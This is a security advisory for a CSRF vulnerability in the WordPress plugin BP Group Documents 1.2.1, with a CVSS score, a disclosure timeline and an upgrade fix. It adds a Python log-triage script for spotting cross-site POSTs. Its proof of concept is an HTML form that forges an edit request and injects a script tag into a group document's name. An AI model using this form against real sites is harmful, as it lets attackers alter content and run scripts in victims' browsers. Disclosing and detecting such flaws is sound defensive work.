Advisory:

CSRF vulnerability in BP Group Documents 1.2.1

Vulnerability

Last revised:

An unauthenticated user can cause a logged-in user to edit the name and description of any existing group document. The fields are also vulnerable to XSS.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability:

  • Score: 5 (Medium)
  • Vector: Network
  • Complexity: Low
  • Authentication: None
  • Confidentiality: None
  • Integrity: Partial
  • Availability: None

You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

Assume we have a group with slug “x” and a group document with id 8:

<form method="POST" action="https://wp.ayumu/groups/x/documents/">
  <input type="text" name="bp_group_documents_operation" value="edit">
  <input type="text" name="bp_group_documents_id" value="8">
  <input type="text" name="bp_group_documents_name" value="&lt;script>alert(1)&lt;/script>">
  <input type="text" name="bp_group_documents_description" value="abc">
  <input type="submit">
</form>

Advisory timeline

  • 2013-09-26: Discovered
  • 2013-09-30: Reported to plugins@wordpress.org
  • 2013-10-04: Fix released (1.2.2)

Mitigation/further actions

Update to version 1.2.2.
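
The proof-of-concept form is submitted from a page on another origin, so the POST it triggers normally reaches the documents endpoint with a Referer that is missing or names a different host. The following Python script is an added example, not part of the original advisory or of the plugin: it triages web server access logs for such POSTs. It assumes the Apache/nginx "combined" log format; the log lines and the host attacker.example are constructed samples.

```python
import re
from urllib.parse import urlsplit

# Constructed sample lines in "combined" log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [27/Sep/2013:10:01:12 +0000] "POST /groups/x/documents/ HTTP/1.1" 302 0 "https://wp.ayumu/groups/x/documents/" "Mozilla/5.0"
203.0.113.9 - - [27/Sep/2013:10:04:40 +0000] "POST /groups/x/documents/ HTTP/1.1" 302 0 "https://attacker.example/poc.html" "Mozilla/5.0"
203.0.113.9 - - [27/Sep/2013:10:05:02 +0000] "GET /groups/x/documents/ HTTP/1.1" 200 5120 "https://attacker.example/poc.html" "Mozilla/5.0"
198.51.100.7 - - [27/Sep/2013:11:15:30 +0000] "POST /groups/staff/documents/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [27/Sep/2013:11:16:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Endpoint the advisory's form posts to: /groups/<slug>/documents/
DOCS_ENDPOINT = re.compile(r'^/groups/[^/]+/documents/?(\?.*)?$')


def suspicious_posts(log_text, site_host):
    """Return (time, ip, path, reason) for POSTs to the documents endpoint
    whose Referer is absent or names a host other than site_host."""
    hits = []
    for line in log_text.splitlines():
        m = COMBINED.match(line)
        if not m or m["method"] != "POST" or not DOCS_ENDPOINT.match(m["path"]):
            continue
        referer = m["referer"]
        if referer in ("", "-"):
            reason = "no referer"
        else:
            host = (urlsplit(referer).hostname or "").lower()
            if host == site_host.lower():
                continue  # same-site submission, the normal edit flow
            reason = f"cross-site referer: {host or 'unparseable'}"
        hits.append((m["time"], m["ip"], m["path"], reason))
    return hits


if __name__ == "__main__":
    for hit in suspicious_posts(SAMPLE_LOG, "wp.ayumu"):
        print(*hit, sep="  ")
```

Access logs do not record POST bodies, so a hit shows only that the endpoint received a cross-site or referer-less POST, not which operation was requested. Hits are leads for reviewing the affected group's document names and descriptions, not proof of exploitation.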